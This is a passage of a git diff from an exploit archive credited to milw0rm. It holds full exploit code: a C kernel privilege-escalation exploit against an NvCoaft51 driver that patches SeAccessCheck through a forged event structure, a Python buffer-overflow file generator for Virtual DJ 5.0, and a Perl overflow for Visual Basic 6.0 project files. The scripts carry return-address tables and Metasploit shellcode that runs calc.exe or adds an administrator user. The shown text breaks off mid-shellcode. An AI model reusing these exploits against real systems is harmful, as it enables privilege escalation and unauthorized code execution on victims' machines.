+ if(!GetVersionExA((LPOSVERSIONINFOA)&osvi))
+ {
+ return OS_VERSION_UNKNOWN;
+ }
+ }
+ switch(osvi.dwPlatformId)
+ {
+ case VER_PLATFORM_WIN32_NT:
+ dwVersion = GetWindowsNtVersion(&osvi, pServicePack);
+ break;
+ case VER_PLATFORM_WIN32_WINDOWS:
+ dwVersion = GetWindows9xVersion(&osvi);
+ break;
+ case VER_PLATFORM_WIN32s:
+ dwVersion = OS_VERSION_WIN32S;
+ break;
+ default:
+ dwVersion = OS_VERSION_UNKNOWN;
+ }
+ return dwVersion;
+}
+
+DWORD
+GetWindowsVersion(PUINT pServicePack)
+{
+ static BOOL bFirstCall = TRUE;
+ static DWORD OsVersion;
+ static UINT ServicePack;
+
+ if(bFirstCall)
+ {
+ OsVersion = GetWindowsVersionBase(&ServicePack);
+ bFirstCall = FALSE;
+ }
+ if(pServicePack)
+ {
+ (*pServicePack) = ServicePack;
+ }
+ return OsVersion;
+}
+
+
+
+HANDLE
+OpenDevice(LPCSTR szDevice, DWORD dwDesiredAccess, DWORD dwShareMode)
+{
+ return CreateFileA(szDevice,dwDesiredAccess,dwShareMode,NULL,OPEN_EXISTING,0,NULL);
+}
+
+VOID
+CloseDevice(HANDLE hDevice)
+{
+ CloseHandle(hDevice);
+}
+
+
+BOOL
+xpltCheckWindowsVersion()
+{
+ DWORD dwOsVersion;
+ BOOL bResult = FALSE;
+ UINT ServicePack;
+
+ printf("(*)Checking OS Version...\n");
+ dwOsVersion = GetWindowsVersion(&ServicePack);
+ if((OS_VERSION_XP == dwOsVersion) && (ServicePack == 2))
+ {
+ printf("(+)Detected Windows XP SP2.\n");
+ bResult = TRUE;
+ }
+ else
+ {
+ printf("(-)This exploit only runs on Windows XP SP2. Sorry.\n");
+ }
+ return bResult;
+}
+
+HANDLE
+xpltOpenNvc0a()
+{
+ HANDLE hDevice;
+
+ printf("(*)Opening NvcOa device...\n");
+ hDevice = OpenDevice("\\\\.\\NvcOa", GENERIC_READ + GENERIC_WRITE, 0);
+ if(INVALID_HANDLE_VALUE != hDevice)
+ {
+ printf("(+)Successfully opened NvcOa.\n");
+ }
+ else
+ {
+ printf("(-)Unable to open NvcOa. Sorry.\n");
+ }
+ return hDevice;
+}
+
+VOID
+xpltCloseNvc0a(HANDLE hDevice)
+{
+ CloseDevice(hDevice);
+ printf("(+)NvcOa device closed.\n");
+}
+
+PPS
+xpltInitializePsApi()
+{
+ PPS pps;
+ printf("(*)Loading PSAPI...\n");
+ pps = psLoad();
+ if(NULL != pps)
+ {
+ printf("(+)PSAPI loaded OK.\n");
+ }
+ else
+ {
+ printf("(-)Unable to load PSAPI. Sorry.\n");
+ }
+ return pps;
+}
+
+VOID
+xpltFreePsApi(PPS pps)
+{
+ psUnload(pps);
+ printf("(+)PSAPI Unloaded.\n");
+}
+
+
+LPBYTE
+xpltGetKernelBase(PPS pps, PBOOL pbPaeKernel)
+{
+ LPBYTE pKernelBase;
+
+ printf("(*)Looking for NTOSKRNL base...\n");
+ (*pbPaeKernel) = FALSE;
+ pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTOSKRNL.EXE");
+ if(pKernelBase)
+ {
+ printf("(+)NTOSKRNL base found at %#x.\n",pKernelBase);
+ }
+ else
+ {
+ pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTKRNLPA.EXE");
+ if(pKernelBase)
+ {
+ printf("(+)NTOSKRNL(PAE) base found at %#x.\n",pKernelBase);
+ if(pbPaeKernel)
+ {
+ (*pbPaeKernel) = TRUE;
+ }
+ }
+ else
+ {
+ printf("(-)Unable to find NTOSKRNL base. Sorry.\n");
+ }
+ }
+ return pKernelBase;
+}
+
+
+/*
+ when the ioctl with a fake event structure is sent
+ a dword with the opcode "jmp[ecx]" is written and
+ this code is reached.
+ Be careful writing your own shellcode. Remember that
+ u are at DPC level
+*/
+__declspec(naked)
+void
+xpltPatchAndGo (void)
+{
+ __asm
+ {
+ add esp,4
+ pop esi /* get a return addr to use as reference */
+ mov dword ptr[esi-0x60], 0x8B047289 /* patch the jmp[ecx] with the correct code */
+ mov word ptr[esi+0xE5303], 0x9090 /* patch SeAccessCheck :o) */
+ mov esp, ebp /* reconstruct the stack */
+ add esp, 0x10
+ xor bl, bl /* set IRQL value */
+ xor edi, edi /* set return value */
+ sub esi, 0x759F
+ push esi /* set retun address... */
+ ret /* and go */
+ }
+
+}
+
+VOID
+xpltExecuteExploit(HANDLE hDevice, PBYTE pNtosBase, BOOL bPaeKernel)
+{
+
+#ifdef _DEBUG
+ DebugBreak();
+#endif
+
+ if(!bPaeKernel)
+ {
+ printf("(-)This exploit is only runs on a PAE kernel system. Sorry.\n");
+ }
+ else
+ {
+ DWORD dwReturnedBytes;
+ DWORD Buffer[1024]; /* user buffer size is not checked */
+ /* properly so i use a big enough buffer */
+ /* and i dont worry abaut it */
+
+ DWORD Event[31]; /* our event struct */
+
+ printf("(*)Trying to exploit the NvCoaft51 KeSetEvent vuln...\n");
+ printf("(*)Writing fake event struct...\n");
+
+ *(BYTE*)Event = 1; /* set event type as Synchronization Event */
+
+ Event[2] = (DWORD)&(Event[3]); /* set event wait list as not empty so in */
+ /* event[3] start the first wait block */
+
+ Event[3] = (DWORD)&(Event[4]); /* set first element of the wait list */
+ /* event[4] will be our wait block */
+
+ ((WORD*)Event)[17] = 1; /* set the wait block type to WaitAny */
+
+ Event[5] = (DWORD)&(Event[7]); /* set the trhead for the wait block, so */
+ /* event[7] will be our thread start */
+
+ Event[7] = (DWORD)xpltPatchAndGo; /* i put the shellcode addr on the first */
+ /* dword of the thread. This value is not */
+ /* checked by KeSetEvent related code, and */
+ /* the event struct will remain referenced */
+ /* by ecx,so writing a jmp[ecx] the */
+ /* shellocde will be reached */
+
+
+ Event[30] = (DWORD)&(Event[10]); /* fill thread wait block list with data */
+ /* so in event[10] start this wait block. */
+ /* First two dwords of the kwait block */
+ /* struct are a list entry. system will */
+ /* try to remove a item from this double */
+ /* linked list, and as consecuence, we */
+ /* can write an arbitrary dword at any */
+ /* address */
+
+
+ Event[10] = 0x000021FF; /* first entry will be a opcode, jmp[ecx] */
+
+ Event[11] = (DWORD)(pNtosBase + 0x291B4); /* second entry will be the address of th */
+ /* next opcode addr, and as result we will */
+ /* jmp to our shellcode */
+
+
+ Buffer[0] = (DWORD)(((PBYTE)(&Event)) - 0x84C); /* store our "event" in the ioctl buffer */
+ /* and explit it :o) */
+
+ printf("(*)Sending IOCTL...\n");
+ DeviceIoControl(hDevice,XPLT_KEVENT_IOCTL,Buffer,sizeof(Buffer),Buffer,sizeof(Buffer),&dwReturnedBytes,NULL);
+ printf("(+)IOCT sent. SeAccessCheck is now patched???\n");
+ }
+}
+
+
+VOID
+xpltExecute()
+{
+ if(xpltCheckWindowsVersion())
+ {
+ PPS pps;
+
+ pps = xpltInitializePsApi();
+ if(NULL != pps)
+ {
+ LPBYTE pKernelBase;
+ BOOL bPaeKernel;
+
+ pKernelBase = xpltGetKernelBase(pps,&bPaeKernel);
+ if(NULL != pKernelBase)
+ {
+ HANDLE hDevice;
+
+ hDevice = xpltOpenNvc0a();
+ if(INVALID_HANDLE_VALUE != hDevice)
+ {
+ xpltExecuteExploit(hDevice, pKernelBase, bPaeKernel);
+ xpltCloseNvc0a(hDevice);
+ }
+ }
+ xpltFreePsApi(pps);
+ }
+ }
+}
+
+int main(int argc, char * argv[])
+{
+ UNREFERENCED_PARAMETER(argc);
+ UNREFERENCED_PARAMETER(argv);
+
+#ifdef _DEBUG
+ DebugBreak();
+#endif
+
+ xpltExecute();
+ return 0;
+}
+
+// milw0rm.com [2007-08-30]
diff --git a/platforms/windows/local/4354.py b/platforms/windows/local/4354.py
index 29667a375..a3a81d935 100755
--- a/platforms/windows/local/4354.py
+++ b/platforms/windows/local/4354.py 
@@ -1,32 +1,32 @@
-#Virtual DJ 5.0 Local Buffer OverFlow
-#224 bytes available for shellcode,, you can replace it with you favourite one,,
-#ret addr -> 0x7199403D jmp esp in mswsock.dll Winxp sp0
-#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224]
-#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
-#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
-# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
-
-shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
-shellcode+= "\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
-shellcode+= "\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
-shellcode+= "\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
-shellcode+= "\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
-shellcode+= "\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
-shellcode+= "\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
-shellcode+= "\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
-shellcode+= "\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
-shellcode+= "\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
-shellcode+= "\xe1\xd1\xfe\xd8"
-
-bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
-
-file = open('c:\/xploit.m3u','w+')
-file.write("#EXTM3U\n");
-file.write("#EXTINF:0,TITLE\n")
-file.write("C:/")
-file.write(bof)
-file.close()
-
-print "Exploit generated in c:\/xploit.m3u ...now open it with virtual dj !! "
-
-# milw0rm.com [2007-09-02]
+#Virtual DJ 5.0 Local Buffer OverFlow
+#224 bytes available for shellcode,, you can replace it with you favourite one,,
+#ret addr -> 0x7199403D jmp esp in mswsock.dll Winxp sp0
+#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224]
+#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
+#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
+# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
+
+shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
+shellcode+= "\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
+shellcode+= "\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
+shellcode+= "\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
+shellcode+= "\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
+shellcode+= "\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
+shellcode+= "\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
+shellcode+= "\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
+shellcode+= "\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
+shellcode+= "\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
+shellcode+= "\xe1\xd1\xfe\xd8"
+
+bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
+
+file = open('c:\/xploit.m3u','w+')
+file.write("#EXTM3U\n");
+file.write("#EXTINF:0,TITLE\n")
+file.write("C:/")
+file.write(bof)
+file.close()
+
+print "Exploit generated in c:\/xploit.m3u ...now open it with virtual dj !! "
+
+# milw0rm.com [2007-09-02]
diff --git a/platforms/windows/local/4355.php b/platforms/windows/local/4355.php
index 8382c67c0..e2c125653 100755
--- a/platforms/windows/local/4355.php
+++ b/platforms/windows/local/4355.php
@@ -7,7 +7,7 @@ exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] && if you want to exploit this vul with SEH ,, take some infos :p [ A x 277 ] + [EIP] + [B x 608] + [Pointer to next SEH record] + [SE handler] by : 0x58 -Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,! +Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,! */ # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = @@ -32,5 +32,5 @@ fputs($file,$bof); fclose($file); echo "Exploit generated in : ".$filename."
    "; ?> - -# milw0rm.com [2007-09-02] + +# milw0rm.com [2007-09-02] diff --git a/platforms/windows/local/4361.pl b/platforms/windows/local/4361.pl index 9d5e98136..2f3272f6d 100755 --- a/platforms/windows/local/4361.pl +++ b/platforms/windows/local/4361.pl 
@@ -1,369 +1,369 @@ -#!/usr/bin/perl -#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ -#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ -#'++ Author: Koshi + -#'++ Email: heykoshi at gmail dot com + -#'++ Application: Microsoft Visual Basic 6.0 + -#'++ + -#'++ Tested on Microsoft Windows XP Home Edition SP2 + -#'++ Patched & Updated + -#'++ + -#'++ The vulnerable buffer exsists in the .VBP files of + -#'++ Visual Basic projects. You can jump directly to + -#'++ the shellcode, or jump to it via EBP. + -#'++ + -#'++ There is NO restriction of shellcode size either. + -#'++ + -#'++ Gr33tz: Rima my baby who I love and adore, Draven + -#'++ for pointing me in the right direction, as always. + -#'++ + -#'++ + -#'++ This exploit is for educational use only, blah. + -#'++ + -#'++ + -#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++ -#'+++++++++++++++++++++++++++++++++++++++++++++++++++++ -# -# Ex. of Usage: -# perl vb6.pl 1 >>Project.vbp -# -# -$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D". - "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A"; - -$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D". - "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30". - "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D". - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23". - "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E". - "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53". - "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F". - "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75". - "\x74\x6F\x6D\x61\x74\x69\x6F\x6E"; - -$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A". - "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22"; - -$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
- "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
- "\x41\x41\x41\x41"; - -$codeAddr = "\x83\x25\x40\x01"; -# You can most likely use a call or a push, you could probably use them from kernel32.dll too. -#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example. -# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) -# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) -# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) -# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) -# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) -# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) -#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) -# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) -# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) -# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) -# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions -# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) -# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) -# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions -# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions -# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions -# ...backwards..if you don't know why, then gtfo. -$jmpEbp = "\xA3\x3D\x92\x7C"; -$fourSkin = "\x44\x44\x44\x44"; - - -$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63". - "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
- "\x41\x41\x41\x41\x41\x41\x41\x41"; - -$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D". - "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65". - "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F". - "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72". - "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30". - "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74". - "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65". - "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77". - "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D". - "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C". - "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D". - "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65". - "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74". - "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68". - "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62". - "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61". - "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65". - "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A"; - -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com -$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". 
- "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". - "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47". - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38". - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48". - "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58". - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44". - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38". - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". - "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47". - "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a". - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". - "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33". - "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37". - "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59". - "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56". - "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"; - -# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com -$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". 
- "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37". - "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58". - "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". - "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". - "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48". - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54". - "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58". - "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". - "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37". - "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". - "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53". - "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". - "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59". - "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46". - "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46". - "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36". - 